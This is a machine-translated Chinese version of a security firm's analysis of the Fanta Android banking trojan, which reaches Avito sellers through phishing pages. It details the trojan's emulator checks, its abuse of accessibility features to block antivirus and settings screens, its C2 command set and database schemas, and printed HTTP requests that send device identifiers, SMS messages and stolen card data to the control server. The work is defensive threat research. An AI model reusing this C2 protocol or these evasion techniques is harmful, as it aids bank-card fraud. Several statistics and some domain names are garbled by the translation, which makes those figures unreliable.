Leisya、Fanta：老牌Android木馬的新戰術

有一天，您想在 Avito 上銷售某種產品，並且在發布了產品的詳細描述（例如 RAM 模組）後，您將收到以下訊息：

打開連結後，您將看到一個看似無害的頁面，通知您（快樂且成功的賣家）已進行購買：

點擊「繼續」按鈕後，帶有圖示和可信任名稱的 APK 檔案將下載到您的 Android 裝置上。 您安裝了一個應用程序，由於某種原因請求了 AccessibilityService 權限，然後出現了幾個窗口，然後很快就消失了......就是這樣。

您去檢查餘額，但由於某種原因，您的銀行應用程式再次要求您提供卡片詳細資訊。 輸入資料後，可怕的事情發生了：由於某種您仍不清楚的原因，錢開始從您的帳戶中消失。 您正試圖解決問題，但您的手機正在抵制：它按下「返回」和「主頁」鍵，不會關閉，也不允許您啟動任何安全措施。 結果，你沒錢了，你的貨物也沒有被購買，你很困惑並想知道：發生了什麼？

答案很簡單：您已經成為Android木馬Fanta的受害者，Fanta是Flexnet家族的一員。 這怎麼發生的？ 現在我們來解釋一下。

作者： 安德烈·波洛文金，惡意軟體分析初級專家， 伊凡·皮薩列夫，惡意軟體分析專家。

一些統計數據

Flexnet Android 木馬家族於 2015 年首次為人所知。 經過相當長的一段時間的活動，這個家族擴展到了幾個亞種：芬達、Limebot、立頓等。 木馬以及與之相關的基礎設施並沒有停滯不前：新的有效分發方案正在開發中 - 在我們的例子中，針對特定用戶賣家的高質量網絡釣魚頁面，木馬開發人員遵循流行趨勢病毒編寫- 添加新功能，可以更有效地從受感染設備竊取資金並繞過保護機制。

本文描述的活動針對的是俄羅斯用戶；烏克蘭記錄了少量受感染的設備，哈薩克和白俄羅斯記錄的受感染設備更少。

儘管 Flexnet 在 Android 木馬領域已經存在 4 年多了，並且已經被許多研究人員詳細研究過，但它仍然處於良好狀態。 從 2019 年 35 月開始，潛在損失金額將超過 2015 萬盧布 - 這僅適用於在俄羅斯進行的活動。 XNUMX年，該Android木馬的各個版本在地下論壇上出售，並可以找到該木馬的原始碼和詳細說明。 這意味著世界範圍內的損失統計數據更加令人印象深刻。 對於這樣一個老人來說，這是一個不錯的指標，不是嗎？

從銷售到欺騙

從先前發布的用於發布廣告 Avito 的網路服務釣魚頁面的螢幕截圖可以看出，它是針對特定受害者而準備的。 顯然，攻擊者使用 Avito 的解析器之一，該解析器提取賣家的電話號碼和姓名以及產品描述。 展開頁面並準備 APK 文件後，受害者會收到一條短信，其中包含受害者的姓名和釣魚頁面的鏈接，其中包含其產品的描述以及從產品“銷售”中收到的金額。 透過點擊該按鈕，用戶會收到惡意 APK 檔案 - Fanta.

對 shcet491[.]ru 域的研究表明，它被委託給 Hostinger 的 DNS 伺服器：

• ns1.hostinger.ru
• ns2.hostinger.ru
• ns3.hostinger.ru
• ns4.hostinger.ru

域區域檔案包含指向 IP 位址 31.220.23[.]236、31.220.23[.]243 和 31.220.23[.]235 的條目。 但是，網域的主要資源記錄（A 記錄）指向 IP 位址為 178.132.1[.]240 的伺服器。

IP位址 178.132.1[.]240 位於 荷蘭 ，屬於主機 世界流。 IP位址31.220.23[.]235、31.220.23[.]236和31.220.23[.]243位於英國，屬於共享託管伺服器HOSTINGER。 用作錄音機 俄羅斯開放省。 以下域也解析為 IP 位址 178.132.1[.]240：

• 斯德爾卡魯[.]ru
• 托瓦爾-av[.]ru
• av-tovar[.]ru
• 魯-斯德爾卡[.]魯
• shcet382[.]ru
• sdelka221[.]ru
• sdelka211[.]ru
• vyplata437[.]ru
• 維普拉塔291[.]ru
• perevod273[.]ru
• perevod901[.]ru

應該注意的是，幾乎所有網域都可以使用以下格式的連結：

http://(www.){0,1}<%domain%>/[0-9]{7}

該模板還包含來自簡訊的連結。 根據歷史數據發現，在上述模式中，一個域名對應多個鏈接，說明利用一個域名將木馬分發給多個受害者。

讓我們稍微向前看一下：透過簡訊連結下載的木馬使用該位址作為控制伺服器 onusedseddohap[.]club。 該網域於2019-03-12註冊，從2019-04-29開始，APK應用程式與該網域進行互動。 根據 VirusTotal 獲得的數據，共有 109 個應用程式與該伺服器進行了互動。 網域名稱本身解析為IP位址 217.23.14[.]27，位於荷蘭，由主機擁有 世界流。 用作錄音機 namecheap。 網域名稱也解析到此 IP 位址 壞浣熊[.]俱樂部 (自2018年09月25日起)及 壞浣熊[.]現場 （從2018年10月25日開始）。 有域名 壞浣熊[.]俱樂部 超過 80 個 APK 檔案與之交互 壞浣熊[.]現場 - 超過100個。

一般來說，攻擊過程如下：

芬達的蓋子下面是什麼？

與許多其他 Android 木馬一樣，Fanta 能夠讀取和發送 SMS 訊息、發出 USSD 請求以及在應用程式（包括銀行應用程式）頂部顯示自己的視窗。 然而，這個家族的功能庫已經到來：芬達開始使用 無障礙服務 用於各種目的：讀取其他應用程式的通知內容、防止偵測並停止受感染設備上木馬的執行等。 芬達適用於所有不低於 4.4 的 Android 版本。 在本文中，我們將仔細研究以下芬達樣本：

• MD5: 0826bd11b2c130c4c8ac137e395ac2d4
• SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
• SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

啟動後立即

啟動後，木馬會立即隱藏其圖示。 只有當受感染設備的名稱不在清單中時，該應用程式才能運行：

• 安卓_x86
• VirtualBox的
• Nexus 5X（牛頭）
• Nexus 5（刮鬍刀）

這個檢查是在木馬的主服務中進行的— 主要服務。 首次啟動時，應用程式的設定參數被初始化為預設值（儲存配置資料的格式及其含義將在後面討論），並且新的受感染設備會在控制伺服器上註冊。 帶有訊息類型的 HTTP POST 請求將被傳送到伺服器 註冊機器人 有關受感染設備的資訊（Android 版本、IMEI、電話號碼、運營商名稱以及由運營商註冊的國家/地區代碼）。 此位址作為控制伺服器 hXXp://onuseseddohap[.]club/controller.php。 作為回應，伺服器發送一條包含欄位的訊息 機器人id, 機器人密碼, 服務器 — 應用程式將這些值儲存為 CnC 伺服器的參數。 範圍 服務器 如果未收到該字段，則可選：芬達使用註冊地址 - hXXp://onuseseddohap[.]club/controller.php。 更改CnC位址功能可以解決兩個問題：一是在多台伺服器之間均勻分配負載（如果受感染設備數量較多，未優化的Web伺服器上的負載可能會很高），二是使用當其中一台CnC 伺服器故障時，提供備用伺服器。

如果發送請求時發生錯誤，木馬將在20秒後重複註冊程序。

設備註冊成功後，Fanta 將向用戶顯示以下訊息：

重要提示：呼叫的服務 系統安全性 ——木馬服務名稱，點選按鈕後 ОК 將打開一個窗口，其中包含受感染設備的輔助功能設置，用戶必須在其中授予惡意服務的輔助功能權限：

用戶一開機 無障礙服務，Fanta 可以存取應用程式視窗的內容以及在其中執行的操作：

取得存取權限後，木馬會立即請求管理員權限和閱讀通知的權限：

使用 AccessibilityService，應用程式可以模擬擊鍵，從而賦予自己所有必要的權限。

Fanta 建立多個資料庫實例（將在後面描述）來儲存配置資料以及在此過程中收集的有關受感染設備的資訊。 為了發送收集到的信息，特洛伊木馬會建立一個重複任務，旨在從資料庫下載欄位並接收來自控制伺服器的命令。 存取CnC的時間間隔根據Android版本設定：5.1的情況下，時間間隔為10秒，否則為60秒。

為了接收命令，芬達提出請求 獲取任務 到管理伺服器。 作為回應，CnC 可以發送以下命令之一：

團隊	描述
0	傳簡訊
1	撥打電話或發送 USSD 命令
2	更新參數 間隔
3	更新參數 截距
6	更新參數 簡訊管理器
9	開始收集簡訊
11	將手機重設為原廠設置
12	啟用/停用對話方塊建立的日誌記錄

Fanta 還收集來自 70 個銀行應用程式、快速支付系統和電子錢包的通知，並將其儲存在資料庫中。

儲存配置參數

為了儲存配置參數，Fanta 使用 Android 平台的標準方法 - 偏好- 文件。 設定將儲存到名為 設置。 下表是已儲存參數的說明。

名	默認值	可能的值	描述
id	0	整型	機器人ID
服務器	hXXp://onuseseddohap[.]club/	網址	控制伺服器位址
密碼	-	串	伺服器密碼
間隔	20	整型	時間間隔。 指示以下任務應推遲多長時間： 發送有關已發送 SMS 訊息狀態的請求時 從管理伺服器接收新命令
截距	全部	全部/電話號碼	如果該欄位等於字串 全部 或 電話號碼，那麼收到的 SMS 訊息將被應用程式攔截並且不會顯示給用戶
簡訊管理器	0	0/1	啟用/停用應用程式作為預設簡訊收件人
讀取對話框	假	真假	啟用/停用事件記錄 無障礙活動

芬達也使用該文件 簡訊管理器:

名	默認值	可能的值	描述
打包	-	串	使用的簡訊管理器的名稱

與資料庫交互

該木馬在運作過程中使用兩個資料庫。 資料庫命名為 a 用於儲存從手機收集的各種資訊。 第二個資料庫名為 芬達資料庫 用於保存負責創建旨在收集銀行卡資訊的網路釣魚視窗的設定。

木馬利用資料庫 а 儲存收集的資訊並記錄您的操作。 資料儲存在表中 日誌。 若要建立表，請使用下列 SQL 查詢：

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

該資料庫包含以下資訊：

1. 用訊息記錄受感染設備的啟動 電話接通了！

2. 來自應用程式的通知。 該訊息根據以下模板產生：

(<%App Name%>)<%Title%>: <%Notification text%>

3.木馬創建的釣魚表單中的銀行卡資料。 範圍 VIEW_NAME 可能是以下其中之一：

• 全球速賣通
• Avito
• Google Play
• 其他<%應用程式名稱%>

該訊息以以下格式記錄：

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. 傳入/傳出 SMS 訊息的格式：

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. 有關創建對話框的包的信息，格式為：

(<%Package name%>)<%Package information%>

範例表 日誌:

芬達的功能之一是收集銀行卡資訊。 透過在開啟銀行應用程式時建立網路釣魚視窗來收集資料。 該木馬僅創建一次網路釣魚視窗。 向使用者顯示視窗的資訊儲存在表中 設置 在資料庫中 芬達資料庫。 若要建立資料庫，請使用下列 SQL 查詢：

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

所有表格字段 設置 預設初始化為1（建立網路釣魚視窗）。 使用者輸入資料後，該值將設定為 0。 表格欄位範例 設置:

• 可以登入 — 此欄位負責在開啟銀行應用程式時顯示表單
• 第一銀行 - 不曾用過
• 可以_avito — 此欄位負責在開啟 Avito 應用程式時顯示表單
• 可以_阿里 — 此欄位負責在開啟 Aliexpress 應用程式時顯示表單
• 可以_另一個 — 此欄位負責在從清單中開啟任何應用程式時顯示表單： Yula、Pandao、Drom Auto、皮夾。 折扣和獎勵卡、Aviasales、Booking、Trivago
• 可以卡 — 此欄位負責在開啟時顯示表單 Google Play

與管理伺服器交互

與管理伺服器的網路互動透過 HTTP 協定進行。 為了與網路合作，Fanta 使用流行的 Retrofit 庫。 請求發送至： hXXp://onuseseddohap[.]club/controller.php。 在伺服器上註冊時可以更改伺服器位址。 Cookie 可能會作為伺服器的回應而發送。 Fanta向伺服器發出以下請求：

• 首次啟動時，機器人會在控制伺服器上註冊一次。 有關受感染設備的以下數據將發送到伺服器：
  · 餅乾 — 從伺服器接收的cookie（預設值為空字串）
  · 模式 — 字串常數 註冊機器人
  · 字首 — 整數常數 2
  · 版本_sdk — 根據以下範本形成： <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
  · IMEI — 受感染設備的 IMEI
  · 國家 — 營運商註冊國家的代碼，採用 ISO 格式
  · 數 - 電話號碼
  · 操作者 — 操作員姓名

  發送到伺服器的請求範例：

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 144
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
  

  為了回應請求，伺服器必須傳回包含以下參數的 JSON 物件：
  · 機器人 ID — 受感染設備的 ID。 如果bot_id等於0，Fanta將重新執行請求。
  機器人密碼 — 伺服器的密碼。
  伺服器 — 控制伺服器位址。 可選參數。 如果不指定該參數，則使用應用程式中儲存的位址。

  JSON 物件範例：

  {
      "response":[
     	 {
     		 "bot_id": <%BOT_ID%>,
     		 "bot_pwd": <%BOT_PWD%>,
     		 "server": <%SERVER%>
     	 }
      ],
      "status":"ok"
  }

• 請求從伺服器接收命令。 以下數據被傳送到伺服器：
  · 餅乾 — 從伺服器接收的cookie
  · 投標 — 發送請求時收到的受感染設備的 ID 註冊機器人
  · 密碼 —伺服器的密碼
  · 設備管理 — 此欄位判斷是否已取得管理員權限。 如果已取得管理員權限，則該欄位等於 1， 否則 0
  · 無障礙服務 — 無障礙服務運作狀況。 如果服務已啟動，則該值為 1， 否則 0
  · 簡訊管理器 — 顯示該木馬是否啟用為接收簡訊的預設應用程式
  · 屏幕 — 顯示螢幕處於什麼狀態。 該值將被設定 1，如果螢幕打開，否則 0;

  發送到伺服器的請求範例：

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

  根據命令的不同，伺服器可以傳回具有不同參數的 JSON 物件：

  · 團隊 傳簡訊：參數包含電話號碼、簡訊內文和發送的簡訊ID。 當向伺服器發送訊息時使用該標識符 設定簡訊狀態.

  {
      "response":
      [
     	 {
     		 "mode": 0,
     		 "sms_number": <%SMS_NUMBER%>,
     		 "sms_text": <%SMS_TEXT%>,
     		 "sms_id": %SMS_ID%
     	 }
      ],
      "status":"ok"
  }

  · 團隊 撥打電話或發送 USSD 命令：電話號碼或指令出現在回應正文中。

  {
      "response":
      [
     	 {
     		 "mode": 1,
     		 "command": <%TEL_NUMBER%>
     	 }
      ],
      "status":"ok"
  }

  · 團隊 變更間隔參數.

  {
      "response":
      [
     	 {
     		 "mode": 2,
     		 "interval": <%SECONDS%>
     	 }
      ],
      "status":"ok"
  }

  · 團隊 更改攔截參數.

  {
      "response":
      [
     	 {
     		 "mode": 3,
     		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
     	 }
      ],
      "status":"ok"
  }

  · 團隊 更改SmsManager字段.

  {
      "response":
      [
     	 {
     		 "mode": 6,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

  · 團隊 從受感染的設備收集短信.

  {
      "response":
      [
     	 {
     		 "mode": 9
     	 }
      ],
      "status":"ok"
  }

  · 團隊 將手機重設為原廠設置:

  {
      "response":
      [
     	 {
     		 "mode": 11
     	 }
      ],
      "status":"ok"
  }

  · 團隊 更改 ReadDialog 參數.

  {
      "response":
      [
     	 {
     		 "mode": 12,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

• 發送帶有類型的消息 設定簡訊狀態。 該請求是在命令執行後發出的 傳簡訊。 該請求如下所示：

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

• 上傳資料庫內容。 每個請求傳輸一行。 以下數據被傳送到伺服器：
  · 餅乾 — 從伺服器接收的cookie
  · 模式 — 字串常數 設定儲存收件匣簡訊
  · 投標 — 發送請求時收到的受感染設備的 ID 註冊機器人
  · 文本 — 目前資料庫記錄中的文字（字段 d 從表 日誌 在資料庫中 а)
  · 數 — 目前資料庫記錄的名稱（字段 p 從表 日誌 在資料庫中 а)
  · 簡訊模式 — 整數值（字段 m 從表 日誌 在資料庫中 а)

  該請求如下所示：

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

  如果成功傳送到伺服器，該行將從表中刪除。 伺服器傳回的 JSON 物件範例：

  {
      "response":[],
      "status":"ok"
  }

與 AccessibilityService 交互

AccessibilityService 的實作是為了讓身心障礙者更容易使用 Android 裝置。 在大多數情況下，需要物理互動才能與應用程式互動。 AccessibilityService 可讓您以程式設計方式執行這些操作。 芬達利用該服務在銀行應用程式中創建虛假窗口，並阻止用戶打開系統設定和某些應用程式。

該特洛伊木馬利用 AccessibilityService 的功能來監視受感染設備螢幕上元素的變更。 如前所述，Fanta 設定包含一個負責使用對話方塊記錄操作的參數 - 讀取對話框。 如果設定此參數，則觸發事件的套件的名稱和描述資訊將新增至資料庫。 當事件被觸發時，木馬會執行以下操作：

• 在下列情況下模擬按後退鍵和首頁鍵：
  · 如果使用者想要重新啟動他的設備
  · 如果使用者想要刪除“Avito”應用程式或更改存取權限
  · 頁面上是否提及“Avito”應用程序
  · 開啟 Google Play Protect 應用程式時
  · 開啟具有 AccessibilityService 設定的頁面時
  · 當系統安全對話框出現時
  · 使用「在其他應用程式上繪製」設定開啟頁面時
  · 開啟「應用程式」頁面時，「恢復和重置」、「資料重置」、「重置設定」、「開發者面板」、「特殊」。 機會”、“特殊機會”、“特殊權利”
  · 如果事件是由某些應用程式產生的。

  申請清單

  • 機器人
  • 大師精簡版
  • 清理大師
  • 適用於 x86 CPU 的 Clean Master
  • 魅族應用程式權限管理
  • MIUI安全
  • Clean Master - 防毒、快取和垃圾清理器
  • 家長監護與 GPS：Kaspersky SafeKids
  • 卡巴斯基防毒軟體 AppLock 與網路安全測試版
  • 病毒清理、防毒、清理（MAX Security）
  • 行動防病毒安全 PRO
  • Avast 防毒軟體與免費保護 2019
  • 行動安全 MegaFon
  • Xperia 的 AVG 保護
  • 行動安全
  • Malwarebytes 防毒與保護
  • 適用於 Android 2019 的防毒軟體
  • 安全大師 - 防毒、VPN、AppLock、Booster
  • 適用於華為平板電腦系統管理員的 AVG 防毒軟體
  • 三星輔助功能
  • 三星智慧管家
  • 安全主管
  • 速度助推器
  • 大蜘蛛
  • Dr.Web安全空間
  • 大蜘蛛移動控制中心
  • Dr.Web安全空間生活
  • 大蜘蛛移動控制中心
  • 防病毒和移動安全
  • 卡巴斯基安全軟體：防毒與保護
  • 卡巴斯基電池壽命：節電器和助推器
  • Kaspersky Endpoint Security - 保護與管理
  • AVG Antivirus 免費 2019 – 針對 Android 的保護
  • Android的防病毒
  • 諾頓移動安全和防病毒
  • 防毒、防火牆、VPN、行動安全
  • 行動安全：防毒、VPN、防盜保護
  • 適用於 Android 的防毒軟體

• 如果在向短號碼發送簡訊時請求許可，芬達會模擬單擊複選框 記住選擇 和按鈕 отправить.
• 當您嘗試從木馬中奪走管理員權限時，它會鎖定手機螢幕。
• 防止新增管理員。
• 如果防毒應用程式 網路博士 偵測到威脅，芬達模仿按下按鈕 忽略.
• 如果事件是由應用程式產生的，則木馬會模擬按後退和主頁按鈕 三星設備保養.
• 如果啟動了包含約 30 種不同互聯網服務的清單中的應用程序，Fanta 會建立帶有表單的網路釣魚窗口，用於輸入有關銀行卡的資訊。 其中：速賣通、Booking、Avito、Google Play 市場組件、Pandao、Drom Auto 等。
  

  釣魚表格

  Fanta 分析受感染設備上正在運行哪些應用程式。 如果打開感興趣的應用程序，該木馬會在所有其他窗口之上顯示一個網絡釣魚窗口，這是用於輸入銀行卡信息的表單。 使用者必須輸入以下資料：

  • 卡號
  • 卡到期日
  • CVV
  • 持卡人姓名（並非所有銀行）

  根據正在運行的應用程序，將顯示不同的網路釣魚視窗。 以下是其中一些範例：

  速賣通：

  
  阿維托：

  
  對於一些其他應用，例如 Google Play 市場、Aviasales、Pandao、Booking、Trivago：
  

  到底是怎樣的
  

  幸運的是，收到文章開頭描述的簡訊的人原來是網路安全專家。 因此，真實的、非導演的版本與之前講述的不同：一個人收到了一條有趣的短信，然後他將其交給了 Group-IB 威脅狩獵情報團隊。 攻擊的結果就是這篇文章。 美好的結局，對吧？ 然而，並不是所有的故事都有如此成功的結局，為了讓你的故事看起來不像導演剪輯的賠錢的，在大多數情況下，遵守以下長期描述的規則就足夠了：

  • 請勿從 Google Play 以外的任何來源為採用 Android 作業系統的行動裝置安裝應用程式
  • 安裝應用程式時，請特別注意應用程式要求的權限
  • 注意下載檔案的副檔名
  • 定期安裝 Android 作業系統更新
  • 不要存取可疑資源，也不要從那裡下載文件
  • 請勿點擊簡訊中收到的連結。

來源： www.habr.com